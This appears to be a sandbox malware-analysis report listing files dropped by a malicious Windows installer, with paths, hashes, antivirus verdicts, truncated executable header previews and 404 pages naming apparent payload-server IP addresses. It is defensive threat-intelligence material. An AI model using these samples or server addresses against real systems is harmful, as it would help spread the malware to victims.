Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....V...V...VE..V...VE.*V...V..fV...V...Vp..VE..V6..V..vV...V.;.V...V...V...V.;+V...VRich...V........................PE..d.....g]..........#......`...........^.........@.......................................... ..........................................................p...?...P.......h...............s..8...............................p............p..P............................text....^.......`.................. ..`.rdata......p.......d..............@..@.data....?..........................@....pdata.......P......................@..@.rsrc....?...p...@...(..............@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_7.txt Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	157696
Entropy (8bit):	5.817263024080333
Encrypted:	false
SSDEEP:	3072:vz8qB8b+YWRzy5T9Ixj2Q5C2APy1LofKkcf1JcwQe9uJ21tKDW6:vz8Tb+JRzy5TYjB0PPy1LaXM16k9uk1o
MD5:	614B53C6D85985DA3A5C895309AC8C16
SHA1:	23CF36C21C7FC55CAB20D8ECB014F7CCB23D9F5F
SHA-256:	C3818839FAC5DAFF7ACD214B1CA8BFDFA6CE25D64123213509C104E38070F3F9
SHA-512:	440361B70C27EE09A44D8D734E5ABD3C2C2654EA749FD80A8CBADD06A72313284468F9485DAB0CFF0068F7F3325A78442E36E0EC8E110D70F04746736BF220CC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....V...V...VE..V...VE.*V...V..fV...V...Vp..VE..V6..V..vV...V.;.V...V...V...V.;+V...VRich...V........................PE..d.....g]..........#......`...........^.........@.......................................... ..........................................................p...?...P.......h...............s..8...............................p............p..P............................text....^.......`.................. ..`.rdata......p.......d..............@..@.data....?..........................@....pdata.......P......................@..@.rsrc....?...p...@...(..............@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_8.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	305664
Entropy (8bit):	7.190712048851076
Encrypted:	false
SSDEEP:	3072:i8vnVAwdwUW/zqBNBodkjTOuitnFRXuwI3jiJA/ErKEmPCGb0lPY5dhuCQVfzV/O:iWnVAwdwUOLrtFxhej8A8rOolbbVh09
MD5:	CFD5BF006F5EFC51046796C64A7CB609
SHA1:	3986E827277402E2E902B971D2A6899F0C093246
SHA-256:	14F4AAC647633049977B71B4CEBCE224A400B175352591D5B6267D19A9B88135
SHA-512:	77BB324E953AFA8F5E613D5E6D82410FB40F142B200CE99B28E773A0987A0FA361524863BBCF86E8640223E5BEBB3FE7B556E3EFA41E6873E1E3D8C648E84EF3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.....O^......................Y......A............@..........................P\.........................................J.......d.....Z.............................P...............................`&..@............................................text...Z........................... ..`.data.....W......J..................@....rsrc.........Z.....................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_8.txt Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	305664
Entropy (8bit):	7.190712048851076
Encrypted:	false
SSDEEP:	3072:i8vnVAwdwUW/zqBNBodkjTOuitnFRXuwI3jiJA/ErKEmPCGb0lPY5dhuCQVfzV/O:iWnVAwdwUOLrtFxhej8A8rOolbbVh09
MD5:	CFD5BF006F5EFC51046796C64A7CB609
SHA1:	3986E827277402E2E902B971D2A6899F0C093246
SHA-256:	14F4AAC647633049977B71B4CEBCE224A400B175352591D5B6267D19A9B88135
SHA-512:	77BB324E953AFA8F5E613D5E6D82410FB40F142B200CE99B28E773A0987A0FA361524863BBCF86E8640223E5BEBB3FE7B556E3EFA41E6873E1E3D8C648E84EF3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.....O^......................Y......A............@..........................P\.........................................J.......d.....Z.............................P...............................`&..@............................................text...Z........................... ..`.data.....W......J..................@....rsrc.........Z.....................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libcurl.dll Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	223232
Entropy (8bit):	7.91725038805347
Encrypted:	false
SSDEEP:	6144:Kk3jgivfCVSRrLV7yAVzKZIjCbanUKWw+ba//PXHUo:30iH0iVPVzKOOunLWf2//0
MD5:	D09BE1F47FD6B827C81A4812B4F7296F
SHA1:	028AE3596C0790E6D7F9F2F3C8E9591527D267F7
SHA-256:	0DE53E7BE51789ADAEC5294346220B20F793E7F8D153A3C110A92D658760697E
SHA-512:	857F44A1383C29208509B8F1164B6438D750D5BB4419ADD7626986333433E67A0D1211EC240CE9472F30A1F32B16C8097ACEBA4B2255641B3D8928F94237F595
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J4e`....Y......!..............................Dk.......................................... .........................-... ...<....................................................................................................................text............t..................`.P..data.... ...........z..............@.`..rdata...........F..................@.`./4...............4..................@.0..bss....h.............................`..edata..............................@.0..idata... ..........................@.0..CRT................................@.0..tls................................@.0..rsrc...............................@.0..reloc...@.......&..................@.0./14..........P.......8..............@.@./29...... ...`.......:..............@.../41..................J..............@.../55..................L..............@.../67..................N..

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libcurlpp.dll Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55808
Entropy (8bit):	6.9891040161841085
Encrypted:	false
SSDEEP:	768:W//WT2mbP+7x4Mx5KzVAn/QqvtdZs8LlR67diTNh4joK7qmQhyOl4UuGoxX9j3D:WHIK1R2VA/Qqvtzz67dbn1QhyOl4UuD
MD5:	E6E578373C2E416289A8DA55F1DC5E8E
SHA1:	B601A229B66EC3D19C2369B36216C6F6EB1C063E
SHA-256:	43E86D650A68F1F91FA2F4375AFF2720E934AA78FA3D33E06363122BF5A9535F
SHA-512:	9DF6A8C418113A77051F6CB02745AD48C521C13CDADB85E0E37F79E29041464C8C7D7BA8C558FDD877035EB8475B6F93E7FC62B38504DDFE696A61480CABAC89
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Gf`....B......!.........T.......0............(k.........................`......x......... ...................... ..0F.. @..$...........................DA...............................?.......................................................text............4..................`.P..data................:..............@.0..rdata...............<..............@.`./4.......@...........B..............@.0..bss..................................`..edata...P... ...H...R..............@.0..idata... ...p......................@.0..CRT................................@.0..tls................................@.0..reloc..............................@.0./14.................................@.@./29...... ..........................@.../41.................................@.../55.................................@.../67.................................@.0./80.......... ..........

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libgcc_s_dw2-1.dll Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	116238
Entropy (8bit):	6.249236557413483
Encrypted:	false
SSDEEP:	3072:nti6N0WeF35Ro7hAWP6cagLSuf6LG3qSbKE4M:ti6N2F33wGJVuHuE
MD5:	9AEC524B616618B0D3D00B27B6F51DA1
SHA1:	64264300801A353DB324D11738FFED876550E1D3
SHA-256:	59A466F77584438FC3ABC0F43EDC0FC99D41851726827A008841F05CFE12DA7E
SHA-512:	0648A26940E8F4AAD73B05AD53E43316DD688E5D55E293CCE88267B2B8744412BE2E0D507DADAD830776BF715BCD819F00F5D1F7AC1C5F1C4F682FB7457A20D0
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....n.........................0................ .........................u.................................... ..$...........................D........................................................text....\.......^..................`.P`.data...,....p.......b..............@.0..rdata..T............d..............@.`@/4.......4.......4...r..............@.0@.bss..................................`..edata..u...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..$.... ......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libstdc++-6.dll Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	662528
Entropy (8bit):	7.222450867745387
Encrypted:	false
SSDEEP:	12288:ZGRoW1chMjnv+gvJhb6bmpPSmCnh4o0v4Mc2jTrKoDSwq/3PmkfT4CmwcMcP1uE:uowcmBhKmlC4o0v4k1
MD5:	5E279950775BAAE5FEA04D2CC4526BCC
SHA1:	8AEF1E10031C3629512C43DD8B0B5D9060878453
SHA-256:	97DE47068327BB822B33C7106F9CBB489480901A6749513EF5C31D229DCACA87
SHA-512:	666325E9ED71DA4955058AEA31B91E2E848BE43211E511865F393B7F537C208C6B31C182F7D728C2704E9FC87E7D1BE3F98F5FEE4D34F11C56764E1C599AFD02
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...........0.......`.....o.........................`............... ..........................w.. @..$...........................DA...............................?.......................................................text....P.......B..................`.P..data.... ...`.......F..............@.`..rdata...........>...H..............@.`./4...........`......................@.0..bss..................................`..edata...........x...6..............@.0..idata... ...p......................@.0..CRT................................@.0..tls................................@.0..reloc...........P..................@.0..aspack.. ...0......................`....adata.......P......................@...................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libwinpthread-1.dll Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	6.292322392729986
Encrypted:	false
SSDEEP:	1536:xPCESXKWzkxTz8uLfdkWr2sUX8YNKykl1wwwwUXrMZE4cYdz:x6baWwxH8EzSHYZE4cYdz
MD5:	1E0D62C34FF2E649EBC5C372065732EE
SHA1:	FCFAA36BA456159B26140A43E80FBD7E9D9AF2DE
SHA-256:	509CB1D1443B623A02562AC760BCED540E327C65157FFA938A22F75E38155723
SHA-512:	3653F8ED8AD3476632F731A3E76C6AAE97898E4BF14F70007C93E53BC443906835BE29F861C4A123DB5B11E0F3DD5013B2B3833469A062060825DF9EE708DC61
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,.Q...........#................@..............d......................................... ...................... ..,....@..,....p..P.......................(............................`.......................A..d............................text...............................`.P`.data...............................@.0..rdata..............................@.`@.bss..................................`..edata..,.... ......................@.0@.idata..,....@......................@.0..CRT....0....P......................@.0..tls.... ....`......................@.0..rsrc...P....p......................@.0..reloc..(...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	297472
Entropy (8bit):	7.956679998165027
Encrypted:	false
SSDEEP:	6144:SCqbkrMCqbFE9VFvRrEQWjinXABNAPWYC2cFDdo:S4rQBEZ5MiXAkPWYhc5d
MD5:	774F0D5B7DC3D2AD9CC4A0D921C9DA8B
SHA1:	74B7AA0A726BEEE6708A1164D1C7EB3E3CE687CE
SHA-256:	29C4D520A083C1707FDC769E0FF9E936372F54294A85F671F24FE4C8FFA937D3
SHA-512:	57BEE412C206AA0FEA2D72130EE7B71BF933778A2D0C49D4314EE44C98350D581882EF7BBF4051E28B75ED0FB09A454FFB83203AAC4ABC49C5831E141B700768
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`....\Y...............H....................@..................................l........ ............................. ...p....................................................................................................................text...............................`.P..data.... ..........................@.`..rdata..............................@.`./4..................................@.0..bss.........`........................`..idata.......p......................@.0..CRT................................@.0..tls................................@.0./14.................................@.@./29.................................@.../41...... ...@......................@.../55......`...`...$..................@.../67..................@..............@.0./80..................B..............@.../91..................D..............@.../102..... ...........r..

C:\Users\user\AppData\Local\Temp\CC4F.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1622408
Entropy (8bit):	6.298350783524153
Encrypted:	false
SSDEEP:	24576:hNZ04UyDzGrVh8xsPCw3/dzcldJndozS35IW1q/kNVSYVEs4j13HLHGJImdV4q:dGrVr3hclvnqzS35IWk/LvRHb0
MD5:	BFA689ECA05147AFD466359DD4A144A3
SHA1:	B3474BE2B836567420F8DC96512AA303F31C8AFC
SHA-256:	B78463B94388FDDB34C03F5DDDD5D542E05CDED6D4E38C6A3588EC2C90F0070B
SHA-512:	8F09781FD585A6DFB8BBC34B9F153B414478B44B28D80A8B0BDC3BED687F3ADAB9E60F08CCEC5D5A3FD916E3091C845F9D96603749490B1F7001430408F711D4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L!y>.@.m.@.m.@.m...l.@.mg$.l.@.mg$.lN@.mg$.l.A.mg$.l.@.mg$.l.@.mg$.m.@.mg$.l.@.mRich.@.m........................PE..L...s<s............!.....,...................P....(K......................................@A.............................&..............8............h...Y.......N..`l..T............................................................................text....).......*.................. ..`RT...........@...................... ..`.data...dW...P.......0..............@....mrdata.h#.......$...>..............@....00cfg...............b..............@..@.rsrc...8............d..............@..@.reloc...N.......P..................@..B........................................................................................................................................................................................................................................

C:\Users\user\Documents\23BwEXBCcNvhGv9NYNw8QgCc.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:CwjqfkkAdjbngxNmJEVYhGEZUMTQFNWY9ANrtjIUhzI4rCLowo9K60eccwzscsgx:wfyjbngcEOHUMUF4YO70405RnYcl
MD5:	FC34A4518C3721FF250AC962733C8461
SHA1:	0228DE93D9EF77FCFF9ECB02659828BA67F40117
SHA-256:	EC3CCB5F1B8278ED67B5764B45E3A0BE586A77A6FF3C8064BA660360F8023CB8
SHA-512:	3957C52B795024A606DFAE61DCD032929BFC25C8103AAA387C7866F19DBD606C8891377F66243EC536D4E5D6B5C5C606C80355962BB548482455C6C1E1C7D60C
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...[2.`.............................v............@.............................................................................P.......0....................P..........................................@...............L............................text............................... ..`.data...............................@....vubi...............................@....runutu.............................@....tih................................@....rsrc...0...........................@..@.reloc...J...P...L...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\Documents\2YlsoBLp3EMqm7duutiwa6KD.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIR+kn7KLcXaoD:J0+oxBeRmR9etdzRxGezH0q72ma+
MD5:	C8DDCE4DE7D2FD26927E6DB3D554AFD0
SHA1:	4C3F77BB7CD753C5F9DB1B780DF00E14D49BB618
SHA-256:	4A47941324BC9F45254B507AA228D2652064B7277C7FCB0674D1E5FE7DC68467
SHA-512:	FB2A5C27B410449BAA3BF9142A38862337E37FD21712AD21C7CDBF3DDBAB76AE4A6153D756B61DB23D9F931D300333BA6B87319F8955E7EEB401D306BC346C28
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 212.193.30.45 Port 80</address>.</body></html>.

C:\Users\user\Documents\3afsq2MGMno51lOXdmeStaLk.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:mP98+Pmw4Jl/gzq4R+dWgEQ5YX8li//Hvil1:meomw47gzEdWgrbk//HU
MD5:	652CE60F8D1EA7AC21DAC40073AF2321
SHA1:	2C602E0D76C208DF0F9A305E3D6502BCCB8FF073
SHA-256:	BDA915D15E254F51EEA3F691857DB7E6E35443F4F29C5EE258E4D03127F180BE
SHA-512:	DCED8F2CFA741840EDB018B36A638CD229588A9AF985DBF7BAC38B8F7F8682AE721DB0639FAC163594CCFCFC7DA37DE4FF79D25B6D100B1F01D7E39F4E2B1CC2
Malicious:	false
Reputation:	unknown
Preview:	MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....Y...............0......H........... ... ....@..................................w....@..................................0.......@...E...........................................................................................................ctors... .............................`.adata.......0......................@....rsrc....E...@...E..................@..@.bss.............y...L..............@.....................................................................................................................................................................................................................................................................................................................\m..w.-4}U#4_em.p`QG*...8..{.k

C:\Users\user\Documents\43mXpM5vSV6ag5hl43kJE3nj.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:f9oCDm4QZLyLB2dFFMwbIUOTPZyZSZ2eCAGlfMy3iyK+hGvXKW4BvCuk:rb8PMwbIVMZSZ1cMB16lsz
MD5:	67848A34646ADF30BCC92518C0AE1BD1
SHA1:	CD098705414B24EB5AB2D1DAA2E42A365AB332DE
SHA-256:	DFD81F4D4795EE535C2D6166C9226F5EF440E696EB572105329A73A704787AA3
SHA-512:	EE98CEDDA9ADF054A8C8EB5ADC6CC2073E39FAD599A6CE92EEE151F896AF6EFFD19E66D89EDFBF352E0BA47B8E48BC34F6AF56225E9AED5AC7DA86D2A62E71D2
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L......_..........................................@..........................P\|.....Z...........................................(.............................\|.....................................0...@...............D............................text...D........................... ..`.data...............................@....dohayi.............................@....vapocav............................@....nivepo.............................@....rsrc....._.........................@..@.reloc...J....\|..L..................@..B........................................................................................................................................................................................................................................................

C:\Users\user\Documents\4kmOewH8kDodZZ2lCCJUwR4o.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:CwM8lI/9+Qa/PHsuH3EbSSSSSabsZGpu:9nQQQacuqSSSSSabsZG
MD5:	A9DED7D6470F741B9F4509863665F74C
SHA1:	FF1A2ABB33D9DD290C9349565586C6C1E445DC1E
SHA-256:	2F326116DF411C1C9AA3728E0C191FD0888FF63DB7DB08CC70DB1F1AEBE88347
SHA-512:	507D729DDC2533616A6DF372BB8C175D44DC5B68D0A455496DE34019FCF685A6EF6A36693CCB9417637CB9783CFD48EDB039274A7C51476FD39F98796B1D78D1
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D................0...................... ....@.. ...............................N....@.....................................S.... ..................................................................................................H............`_...&.tJ... ...L..................@....text...`............P.............. ..`.rsrc........ ......................@..@.reloc..............................@..B.................................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\5VYY5Jfm1TgW9nVctu3WNDWJ.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIR+kn7gLcXaoD:J0+oxBeRmR9etdzRxGezH0q7gLma+
MD5:	978489E2DDB94E1A8F3C4842596BED8B
SHA1:	CCDAA1B6E674D7D7F6E2FE7233239ADD9D62CC75
SHA-256:	222FF59C7DCD2FFE6BBFAA15DDA759C48F5F205DF0B82BCF969FAF845C1F12E2
SHA-512:	A99B30607BF0FD80458374DE3688C7E1AE5FF2CEDE946DA308B13BA5639B0500E69A09E2B8A94BEDB0D59B4B5B031149AFEE6E98C2556254EFFC1A6D8EECE837
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 212.193.30.29 Port 80</address>.</body></html>.

C:\Users\user\Documents\62ZxL2NI48wEtSDqLisV5B5p.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:flSQc2qhAGg2AV5c+dznE1rA8r6nDDrBC14SrxCbsxg7GMjH5oRWSe:f4Qc2BG0cunERAtBC1Pd8sxSbZoRW
MD5:	D08898F15B9373D16001E84A320628E5
SHA1:	9350EC1E0FCA1C3E78A56025596D4A230832BBBE
SHA-256:	018AE123C7095FA1CF54A2FED5F54A4E953A556BB1B180D80E9D955351A93DB8
SHA-512:	A66929317B32590312BF81CF64EC2F89524159C28AB86E40095EBEA41267E78C61C716BA73183DB82991C5C55D6C4002E845C24DAE92EFFF2BD0D2FE3BECE003
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L....fe_.................X...v.......6.......p....@..................................Q.......................................S..(....@...{..................................................X...........@...............8............................text...HW.......X.................. ..`.data........p.......\..............@....mepav...............t..............@....butoji...... .......v..............@....xuteru......0.......x..............@....rsrc....{...@...\|..................@..@.reloc...F.......H..................@..B................................................................................................................................................................................................................................................................

C:\Users\user\Documents\AVKqP7CFw2sgxjPkEFXixv3V.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	196608:91OLi0Xz1oNNxRqT8kMmyur5ums3v2DF2r:3Oe0D2Txw8Hmd5uxvF
MD5:	F7A84C588542DBD6AAB35892B9D88DCD
SHA1:	531ED1D8622968E1979D2561D5F98ADBAEC40B31
SHA-256:	DBF97E84632CCD62E28F0A7CC717A5C5C67D9FF99638D8D12084DC6796761E04
SHA-512:	7C2EED1DA4E18605D8B3B85A71079B2084586F2C0F013283F9CFF3A0B0D94595550C8BE0DA2DB6D6B38A6E56498895842FE14F8E6F78B809C9591FB27073E1D6
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\E720L1M1wcDP03pvh4WlMQD6.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:b/D0I7bieAtJl4gcl4LxzuB5IK+hJEacXVeN19xPkNj:b/xAZclKxYIINFefPGj
MD5:	3ECFD5D9F991294510E111DCF96357FD
SHA1:	7B208DA6822F3B04E27F0B1DCE0E48B11D3E7DA7
SHA-256:	9F7FDE5DC8DD5812E5F58AAB39268D6FFB15FD7A1CCD77686FA970EF55693F85
SHA-512:	36DD26FB198A46E7B453BF13D781BB4F3F970368869BBCBC0F5D8472BAC22B42ABCD41705EB0A0F3085079C8CF37E18513BB695F3EA7210C8D622C630C5039C4
Malicious:	false
Reputation:	unknown
Preview:	MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L.....................0......H........... ...@....@..........................@............@..................................`.......p..pG...........................................................................................................gfids...P.............................`BSS..........`......................@....rsrc...pG...p......................@..@BSS..............y...$..............@.....................................................................................................................................................................................................................................................................................................................on..D.}[A.y[[C%.x..t.k..i...

C:\Users\user\Documents\KZb7b5nQhyxywttU5a6OGhmR.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12:TjeRHdHiHZdtklI5r4NGlTF5TF5TF5TF5TF5TFK:neRH988aTPTPTPTPTPTc
MD5:	9E47D3A502A7B2BCEC1F1375430CA0EB
SHA1:	E3845E5E982AE0580FA31ABF301C803D89ADAB52
SHA-256:	CBF1FDFDB7257DAF8B0905D94BD04E2829C502C9C01B1D96BB979069E2EBC895
SHA-512:	8239210B404E0B19E841D7832D73452617A17C39A29F7CB6E8CCE8F1474B7C17D6ACBA630EFB6510CB3F0315C3147B7BB62C0B0BEECEF8EF29764B8B906E8EF3
Malicious:	false
Reputation:	unknown
Preview:	<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.14.0 (Ubuntu)</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..

C:\Users\user\Documents\LGWvGO5nGkFCrd4L2uFL5DeK.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:CLw0gZFUJuzEpCMQaVQ3lupttUH2jQ66PYTnxRcqh+ZygmiuLscbTzAIIbasU+By:mPJOqppLUHWP6PY7xRUjAocF+Fn
MD5:	399A7496E00DAC0E986FB7E4842E6A2C
SHA1:	8C837A80329CD1894050AE8163881289A971A99E
SHA-256:	7747F0397EF330B53D0BD68DFE9ED416A935851760657B7DF0ED93A7A8A5692C
SHA-512:	75B3467BC465E7AC9841E6A742A21373F2A044C0266C388B7BB63331ACEE73E05EAA329E4B3A700FF1EEF0C85D84F128D72D119B5018A1B29C88E29B8589D8EA
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...................0.............>.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H.......$7..........PD......t...................................................g.......y....(.E...s.?...W.......(i...f....(j...r7..p(....(k...f....ol...(m...ol...on....sCD...\|...f....ol...r.#.p(....on...f....o....r.#.p(....on...f....o....rO$.p(....(k........o....r.$.p(....r...p(....r-..p(....(....on...f....o....r4%.p(....(k...f....o....rv%.p(....(k...f....o....r.&.p(....(k...f....o....rk&.p(....(k....~....:#...r.&.p(.....#...(....o....s.........~.....~....*.~

C:\Users\user\Documents\MBQu1S3moACEXZ87D1YEJhpQ.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIR+kn7KLcXaoD:J0+oxBeRmR9etdzRxGezH0q72ma+
MD5:	C8DDCE4DE7D2FD26927E6DB3D554AFD0
